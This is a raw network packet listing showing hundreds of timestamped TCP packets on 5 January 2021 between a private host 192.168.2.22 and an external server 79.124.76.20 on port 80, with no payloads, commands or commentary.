Jan 5, 2021 10:06:48.772799015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772960901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772998095 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773211002 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773241997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773499012 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773524046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773684978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773716927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773889065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.773922920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774125099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774152040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774279118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.774331093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774353027 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.774357080 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.774362087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774409056 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.774569035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774590969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774689913 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.774796009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774817944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.774868965 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.775011063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775038958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775130033 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.775253057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775285006 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775331974 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.775541067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775566101 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775593042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775684118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775773048 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.775803089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.775850058 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.775922060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776046038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776146889 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.776242018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776273012 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776401043 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.776474953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776499987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776551962 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.776726007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776757956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776830912 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.776932955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.776957035 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777009010 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.777172089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777196884 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777290106 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.777403116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777430058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777483940 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.777688026 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777719021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777857065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777885914 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.777964115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778085947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778218031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778270960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778403997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778523922 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778681993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778763056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778857946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.778966904 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779090881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779190063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779325962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779448986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779521942 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779645920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779772043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.779886961 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780004978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780098915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780205011 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780379057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780466080 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.780484915 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.780531883 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.780575037 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780602932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780689955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780822039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.780889988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781024933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781119108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781245947 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781372070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781501055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781625986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781686068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781686068 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.781703949 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.781810045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.781920910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782049894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782174110 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782201052 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.782273054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782370090 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782649994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782674074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782845974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.782876015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783049107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783092022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783282995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783294916 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.783312082 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.783380032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783437014 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.783516884 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783540010 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783693075 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.783776045 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783806086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.783857107 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.783976078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784001112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784090996 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.784199953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784221888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784277916 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.784285069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784415007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784531116 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784569979 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.784640074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784720898 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.784769058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784893036 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.784992933 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.785001993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785085917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785145998 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.785212040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785332918 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785420895 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.785448074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785603046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785634995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785758972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.785784006 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.785859108 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.785902023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786072016 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786119938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786216021 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.786252975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786369085 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786395073 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.786465883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786556959 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.786617994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786729097 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786803007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.786845922 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.786927938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787049055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787064075 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.787122965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787209034 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.787226915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787369013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787482977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787645102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787725925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787803888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.787955999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788084984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788163900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788289070 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788405895 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788477898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788609028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788719893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788846970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.788942099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789127111 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789202929 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789278030 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789378881 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789520979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789609909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789726973 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789829969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.789899111 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.789916039 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.789920092 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.789983988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790083885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790148020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.790189028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790468931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790503025 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790525913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790561914 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.790642023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790698051 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.790764093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790894032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.790951967 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.790963888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791083097 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791137934 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.791213989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791368008 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791451931 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791481018 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.791567087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791611910 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.791866064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791929007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.791981936 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.792056084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792078972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792119026 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.792257071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792279959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792409897 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.792491913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792515039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792560101 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.792699099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792722940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792810917 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.792927027 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.792949915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793096066 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.793129921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793162107 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793217897 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.793365955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793404102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793508053 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.793525934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793652058 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793781996 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.793826103 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793848038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.793950081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794085979 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794275999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794296980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794482946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794519901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794728994 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794749975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.794929028 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795000076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795191050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795213938 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795434952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795459032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795604944 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.795700073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795722008 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795778990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795845985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.795968056 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796214104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796240091 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.796247005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796442032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796463966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796673059 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796695948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796891928 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796915054 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.796968937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797086954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797211885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797243118 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.797261953 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.797267914 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.797342062 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797425032 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797477007 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.797574043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797651052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797652006 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.797811031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.797929049 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.798011065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798043966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798206091 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.798263073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798285007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798324108 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.798464060 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798491955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798548937 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.798702955 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798726082 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798784971 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.798930883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.798957109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799046040 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.799160957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799184084 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799289942 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.799418926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799443007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799578905 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.799611092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799634933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799720049 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.799850941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799875021 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799941063 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.799943924 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.800056934 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.800122023 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.800170898 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.800276041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.800416946 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.800436020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.800630093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.800656080 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.800854921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.800887108 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801090002 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801120043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801357985 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801403999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801603079 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801626921 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801769972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801803112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.801995039 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.802016020 CET	80	49170	79.124.76.20	192.168.2.22
